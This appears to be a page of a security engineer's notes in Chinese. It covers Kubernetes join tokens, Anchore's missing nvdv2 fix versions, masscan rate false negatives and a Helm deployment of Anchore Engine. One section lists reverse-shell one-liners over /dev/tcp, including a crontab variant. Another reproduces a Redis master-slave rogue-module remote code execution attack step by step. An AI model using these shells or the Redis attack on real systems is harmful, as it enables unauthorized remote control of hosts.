[root@k8s-master ~]# kubeadm  token create  //重新生成
igpl9v.9sfix2xeu9lmekrd

在node上继续执行:

[root@k8s-node1 ~]# kubeadm join --token=igpl9v.9sfix2xeu9lmekrd 192.168.47.146:6443 --discovery-token-unsafe-skip-ca-verification

查看错误:

[root@localhost ~]# journalctl -f -u kubelet

解决anchore对于nvdv2没有修复版本的版本

起因

使用anchore扫描镜像后,发现nvdv2类型的漏洞都没有修复版本,所以这就造成了在修复漏洞的时候,形成很大问题。
接口地址:http://192.168.47.144:8228/images/by_id/454010c206d656fd57da9c7bb4aba3cf81afd04aafdb826b50c6db71d07000d9/vuln/all
image

分析

之后想的解决办法是从数据库里找到哪个表的字段是存修复版本的,然后写个脚本把修复版本补进去。后来发现数据库里根本没有存nvdv2类型的修复版本,这里顺带提一句,对于feed为vulnerabilities的漏洞,修复版本存在feed_data_vulnerabilities_fixed_artifacts的version字段。具体分析如下:
从接口分析,分析得出接口调用的是get_image_vulnerabilities_by_type_imageId函数
image
调用关系是:get_image_vulnerabilities_by_type_imageId->get_image_vulnerabilities_by_type->vulnerability_query->client.get_image_vulnerabilities
resp的内容就是镜像的漏洞结果
image
那get_image_vulnerabilities做了哪些事情,继续分析,有两个地方定义了get_image_vulnerabilities定,分别在:
/opt/rh/rh-python36/root/usr/lib/python3.6/site-packages/anchore_engine/services/policy_engine/api/controllers/synchronous_operations.py

/opt/rh/rh-python36/root/usr/lib/python3.6/site-packages/anchore_engine/clients/services/policy_engine.py

这里先通过clients/services/policy_engine.py的get_image_vulnerabilities向users/{user_id}/images/{image_id}/vulnerabilities接口提交一个请求,从分析anchy_get得出处理请求的ip是engine-policy-engine
image

image
查找users/{user_id}/images/{image_id}/vulnerabilities,通过swagger.yaml看出处理这个请求的函数是anchore_engine.services.policy_engine.api.controllers.synchronous_operations的get_image_vulnerabilities,也叫get_image_vulnerabilities。
image
那我们看看get_image_vulnerabilities做了什么,函数通过img.vulnerabilities()从数据库里获取feed等于vulnerabilities的漏洞信息,然后存到rows列表里,其中的vuln.fixed_in()就是获取数据库里feed=vulnerabilities的修复版本
image
继续看fixed_in做了什么,fixed_in在/opt/rh/rh-python36/root/usr/lib/python3.6/site-packages/anchore_engine/db/entities/policy_engine.py定义,通过fixed_artifact获取到修复版本,而fixed_artifact是查询了数据库里的feed_data_vulnerabilities_fixed_artifacts表,对于feed是vulnerabilities的修复版本如何获取的分析告一段落。
image
对于feed是nvdv2的漏洞,在synchronous_operations.py的get_image_vulnerabilities函数中做了另外一种处理,通过get_fixed_in来获取修复版本
image
那看看get_fixed_in做了什么,get_fixed_in在/opt/rh/rh-python36/root/usr/lib/python3.6/site-packages/anchore_engine/db/entities/policy_engine.py定义,通过查找get_fixed_in会发现这个文件里定义了3个get_fixed_in,其中控制feed是nvdv2的修复版本的是1086行的那个,从代码里可以看到这里直接返回了空
image
为了验证分析是否正确,所以把return []改成return ['2.2'],看看结果是否有变化:
image
从结果看,确实是在这里控制修复版本的输出,所以可以在这里添加代码达到目的。但是如果使用这种方法,会对程序有侵入性,并且还要修改数据库,新增一个修复版本字段,很麻烦。所以我换了个办法,想着能在哪些存修复信息对程序影响最小,最后选择了放在url里,可以在url里加个锚点,如:http://xxx/cve-2019-1234#1.20,这样既可以存数据又不会影响本来的url。
image
当时想着写个脚本把数据库里的所有nvdv2的漏洞全部加上版本,但是后来发现一个漏洞可以对应多个版本号,并且有些是包含,有的是不包含,就算把所有版本提取出来加到url后面,对于包含和不包含的区分也比较麻烦。最后还是放弃了这个思路。
image

结论:

刚开始对于修复版本,是通过获取到https://nvd.nist.gov/获取到相应的版本号,接着判断此版本号是including的话,就在最后一位版本加1就变成了修复版本,如:17.12变成17.13,是excluding的话就是修复版本。但是后来又发现这种办法在大部分的情况下是对的,但是有的情况是修复版本不是简单的17.12变成17.13,而是17.12.1。所以这种获取修复版本的思路也不理想。最终的思路是:
1、通过https://nvd.nist.gov/获取受影响的版本号
2、通过受影响组件名字和受影响版本号去https://mvnrepository.com/获取受影响组件的受影响版本号的下一个版本号,这个版本号就是修复版本的版本号
image

最后给个效果图
image

反弹shell

exec 5<>/dev/tcp/172.21.244.134/8008;cat <&5 | while read line; do $line 2>&5 >&5; done //写入crontab反弹回来执行命令没有回显
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196

bash -i>& /dev/tcp/192.168.84.111/8888 0>&1

Redis主从漏洞复现

主从模式

主(master)和 从(slave)部署在不同的服务器上,当主节点写入数据时会同步到从节点的服务器上,一般主节点负责写入数据,从节点负责读取数据
image
做个实验验证下:
1、本机启动两个redis,端口分别为6379(主)和6380(从)。客户端先连接6379端口,写入几个值
image

2、连接6380端口,执行slaveof 127.0.0.1 6379 ,将6379设置为主服务
image

redis模块

redis4.0后可以通过加载so文件,来实现外部扩展。并且可以通过FULLRESYNC命令同步文件到从机上。通过这些特性,从而实现攻击。

攻击步骤

1、连接受害者redis, 执行命令SLAVEOF evil_ip evil_ip
2、在受害者redis设置dir和dbfilename,dbfilename为恶意so文件
3、通过同步将module写入受害者redis磁盘上:+FULLRESYNC <Z*40> 1\r\n$\r\n
4、在受害者redis上加载模块: MODULE LOAD /tmp/exp_lin.so
5、加载成功后,利用system.exec进行命令执行

复现过程

exp:https://github.com/n0b0dyCN/redis-rogue-server
1、编译exp.so
image
2、运行攻击程序
192.168.47.146是受害者IP,6666是受害者的redis端口
192.168.47.105是入侵者IP,7777是攻击程序模拟redis监听的端口,随便写
image

masscan的扫描速率引发的问题

在使用masscan做扫描的时候,经常会因为设置rate过大导致出现漏报,下图是扫同一台机器出现的完全不同的结果:
image

可以看出速率是70000的时候,一个端口都没扫到。而速率是7000的时候,扫到了两个端口。虽然之前就有预料到这个情况,但是还是没想到差距那么大,这也导致了扫描大量主机的时候,会有很多漏报,如下图:
image

之后应该不会使用masscan+nmap的方式来监控,原因就是漏报太多了

在k8s上使用helm部署Anchore Engine

背景

官方的部署方案不完整,会因为没有为postgres设置pv而导致部署失败,而官方文档也没有提醒需要自己建立pv。

安装条件

  • 安装了helm
  • 安装了Tiller
  • 安装了k8s
  • 需要20g空间给数据库使用

安装

1、更新Helm Charts仓库

[root@sec-infoanalysis2-test ops]# helm repo update
Hang tight while we grab the latest from your chart repositories...
...Skip local chart repository
...Successfully got an update from the "stable" chart repository
Update Complete.

2、使用helm安装

[root@sec-infoanalysis2-test ops]# helm install --name anchore stable/anchore-engine --set postgresql.postgresPassword=test,anchoreGlobal.defaultAdminPassword=test,anchoreAnalyzer.layerCacheMaxGigabytes=4,anchoreAnalyzer.replicaCount=5,anchorePolicyEngine.replicaCount=3
NAME:   anchore
LAST DEPLOYED: Wed Oct 23 13:56:29 2019
NAMESPACE: default
STATUS: DEPLOYED

RESOURCES:
==> v1/ConfigMap
NAME                                 DATA  AGE
anchore-anchore-engine           4     0s
anchore-anchore-engine-analyzer  1     0s
anchore-postgresql               0     0s

==> v1/Deployment
NAME                                    READY  UP-TO-DATE  AVAILABLE  AGE
anchore-anchore-engine-analyzer     0/1    1           0          0s
anchore-anchore-engine-api          0/1    1           0          0s
anchore-anchore-engine-catalog      0/1    1           0          0s
anchore-anchore-engine-policy       0/1    1           0          0s
anchore-anchore-engine-simplequeue  0/1    0           0          0s

3、查看pod的状态,发现postgresql的状态pending,原因是没有建立pv,而官方教程并没有提醒。

[root@sec-infoanalysis2-test ops]# kubectl get pods
NAME                                                     READY   STATUS    RESTARTS   AGE
anchore-anchore-engine-analyzer-779c48d479-8gtvl     0/1     Running   0          11s
anchore-anchore-engine-api-5c67f58476-lc6rp          0/1     Running   0          11s
anchore-anchore-engine-catalog-99db9fd77-fkfkr       0/1     Running   0          11s
anchore-anchore-engine-policy-bcff8c8fc-lm4k2        0/1     Running   0          11s
anchore-anchore-engine-simplequeue-5cdcb9c74-wq72v   0/1     Running   0          11s
anchore-postgresql-c6657b6c7-4hwh5                   0/1     Pending   0          11s
[root@sec-infoanalysis2-test ops]# kubectl get pvc
NAME                     STATUS    VOLUME   CAPACITY   ACCESS MODES   STORAGECLASS   AGE
anchore-postgresql   Pending                                                     4m20s
[root@sec-infoanalysis2-test ops]# kubectl get pv
No resources found.

4、建立pv,这里使用的是nfs,关于nfs服务的部署这里就不说了

[root@sec-infoanalysis2-test ops]# cat pv.yaml 
kind: PersistentVolume
apiVersion: v1
metadata:
  name: anchore-pv-volume
  labels:
    type: postgresql
spec:
  capacity:
    storage: 20Gi
  accessModes:
    - ReadWriteOnce
  nfs:
    server: 192.168.47.146 
    path: "/data"
[root@sec-infoanalysis2-test ops]# showmount -e localhost //查看nfs挂载目录
Export list for localhost:
/data *
[root@sec-infoanalysis2-test ops]# kubectl create -f pv.yaml 
persistentvolume/anchore-pv-volume created
[root@sec-infoanalysis2-test ops]# kubectl get pv
NAME                CAPACITY   ACCESS MODES   RECLAIM POLICY   STATUS      CLAIM   STORAGECLASS   REASON   AGE
anchore-pv-volume   20Gi       RWO            Retain           Available                                   4s
[root@sec-infoanalysis2-test ops]# kubectl get pv
NAME                CAPACITY   ACCESS MODES   RECLAIM POLICY   STATUS   CLAIM                        STORAGECLASS   REASON   AGE
anchore-pv-volume   20Gi       RWO            Retain           Bound    default/anchore-postgresql                           12s
[root@sec-infoanalysis2-test ops]# kubectl get pvc
NAME                 STATUS   VOLUME              CAPACITY   ACCESS MODES   STORAGECLASS   AGE
anchore-postgresql   Bound    anchore-pv-volume   20Gi       RWO                           3m24s

5、查看anchore状态

[root@sec-infoanalysis1-test ops]# pip install anchorecli  //安装客户端
[root@sec-infoanalysis1-test ops]# anchore-cli --u admin --p test --url http://10.103.227.236:8228/v1 system status
Service policy_engine (anchore-anchore-engine-policy-bcff8c8fc-lm4k2, http://anchore-anchore-engine-policy:8087): up
Service simplequeue (anchore-anchore-engine-simplequeue-5cdcb9c74-wq72v, http://anchore-anchore-engine-simplequeue:8083): up
Service analyzer (anchore-anchore-engine-analyzer-779c48d479-8gtvl, http://anchore-anchore-engine-analyzer:8084): up
Service apiext (anchore-anchore-engine-api-5c67f58476-lc6rp, http://anchore-anchore-engine-api:8228): up
Service catalog (anchore-anchore-engine-catalog-99db9fd77-fkfkr, http://anchore-anchore-engine-catalog:8082): up

Engine DB Version: 0.0.11
Engine Code Version: 0.5.1

6、暴露服务
需要创建一个名为anchore-engine的svc,把pod内部的8228端口暴露出来,用于给Jenkins调用,其中EXTERNAL-IP肯定是pending,因为没有使用Amazon之类的服务。使用任意节点真实ip+31627端口可以访问暴露出来的服务

[root@sec-infoanalysis2-test ops]# kubectl expose deployment anchore-anchore-engine-api --type=LoadBalancer --name=anchore-engine --port=8228 
service/anchore-engine exposed
[root@sec-infoanalysis2-test ops]# kubectl get svc
NAME                                     TYPE           CLUSTER-IP       EXTERNAL-IP   PORT(S)          AGE
anchore-anchore-engine-api           ClusterIP      10.103.227.236   <none>        8228/TCP         131m
anchore-anchore-engine-catalog       ClusterIP      10.104.243.28    <none>        8082/TCP         131m
anchore-anchore-engine-policy        ClusterIP      10.105.2.122     <none>        8087/TCP         131m
anchore-anchore-engine-simplequeue   ClusterIP      10.100.39.207    <none>        8083/TCP         131m
anchore-postgresql                   ClusterIP      10.111.41.100    <none>        5432/TCP         131m
anchore-engine                           LoadBalancer   10.101.52.243    <pending>     8228:31627/TCP   2s

[root@sec-infoanalysis1-test ops]# anchore-cli --u admin --p test --url http://192.168.47.144:31627/v1 system status
Service catalog (anchore-anchore-engine-catalog-99db9fd77-fkfkr, http://anchore-anchore-engine-catalog:8082): up
Service policy_engine (anchore-anchore-engine-policy-bcff8c8fc-lm4k2, http://anchore-anchore-engine-policy:8087): up
Service simplequeue (anchore-anchore-engine-simplequeue-5cdcb9c74-wq72v, http://anchore-anchore-engine-simplequeue:8083): up
Service analyzer (anchore-anchore-engine-analyzer-779c48d479-8gtvl, http://anchore-anchore-engine-analyzer:8084): up
Service apiext (anchore-anchore-engine-api-5c67f58476-lc6rp, http://anchore-anchore-engine-api:8228): up

Engine DB Version: 0.0.11
Engine Code Version: 0.5.1

报错处理:

1、如果报错MountVolume.SetUp failed for volume "anchore-pv-volume" : mount failed: exit status 32,是因为k8s节点没有安装nfs相关,需执行命令:yum install nfs-common nfs-utils -y

[root@sec-infoanalysis2-test ~]# kubectl describe pod anchore-postgresql-c6657b6c7-4hwh5
Name:           anchore-postgresql-c6657b6c7-4hwh5
Namespace:      default
Priority:       0
Node:           sec-k8s-node1/192.168.47.144
Start Time:     Wed, 23 Oct 2019 14:33:47 +0800
Labels:         app=postgresql
                pod-template-hash=c6657b6c7
                release=anchore-chj
Annotations:    <none>
Status:         Pending
IP:             
Controlled By:  ReplicaSet/anchore-postgresql-c6657b6c7
Containers:
  anchore-postgresql:
    Container ID:   
    Image:          postgres:9.6.2
    Image ID:       
    Port:           5432/TCP
    Host Port:      0/TCP
    State:          Waiting
      Reason:       ContainerCreating
    Ready:          False
    Restart Count:  0
    Requests:
      cpu:      100m
      memory:   256Mi
    Liveness:   exec [sh -c exec pg_isready --host $POD_IP] delay=60s timeout=5s period=10s #success=1 #failure=6
    Readiness:  exec [sh -c exec pg_isready --host $POD_IP] delay=5s timeout=3s period=5s #success=1 #failure=3
    Environment:
      POSTGRES_USER:         anchoreengine
      PGUSER:                anchoreengine
      POSTGRES_DB:           anchore
      POSTGRES_INITDB_ARGS:  
      PGDATA:                /var/lib/postgresql/data/pgdata
      POSTGRES_PASSWORD:     <set to the key 'postgres-password' in secret 'anchore-postgresql'>  Optional: false
      POD_IP:                 (v1:status.podIP)
    Mounts:
      /var/lib/postgresql/data/pgdata from data (rw,path="postgresql-db")
      /var/run/secrets/kubernetes.io/serviceaccount from default-token-m4s9k (ro)
Conditions:
  Type              Status
  Initialized       True 
  Ready             False 
  ContainersReady   False 
  PodScheduled      True 
Volumes:
  data:
    Type:       PersistentVolumeClaim (a reference to a PersistentVolumeClaim in the same namespace)
    ClaimName:  anchore-postgresql
    ReadOnly:   false
  default-token-m4s9k:
    Type:        Secret (a volume populated by a Secret)
    SecretName:  default-token-m4s9k
    Optional:    false
QoS Class:       Burstable
Node-Selectors:  <none>
Tolerations:     node.kubernetes.io/not-ready:NoExecute for 300s
                 node.kubernetes.io/unreachable:NoExecute for 300s
Events:
  Type     Reason            Age                   From                    Message
  ----     ------            ----                  ----                    -------
  Warning  FailedScheduling  5m40s (x30 over 42m)  default-scheduler       pod has unbound immediate PersistentVolumeClaims (repeated 2 times)
  Normal   Scheduled         5m36s                 default-scheduler       Successfully assigned default/anchore-postgresql-c6657b6c7-4hwh5 to sec-k8s-node1
  Warning  FailedMount       5m35s                 kubelet, sec-k8s-node1  MountVolume.SetUp failed for volume "anchore-pv-volume" : mount failed: exit status 32

建议使用外部数据库:

# helm install --name anchore stable/anchore-engine --set postgresql.postgresPassword=xxx,anchoreGlobal.defaultAdminPassword=xxx,postgresql.postgresUser=postgres,postgresql.postgresDatabase=anchore,postgresql.externalEndpoint=192.168.47.146:5432,anchoreGlobal.logLevel=DEBUG,anchore-feeds-db.postgresPassword=xxx,anchore-feeds-db.externalEndpoint=192.168.47.146:5432,anchoreAnalyzer.layerCacheMaxGigabytes=4

参考链接:
https://docs.anchore.com/current/docs/engine/engine_installation/helm/

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.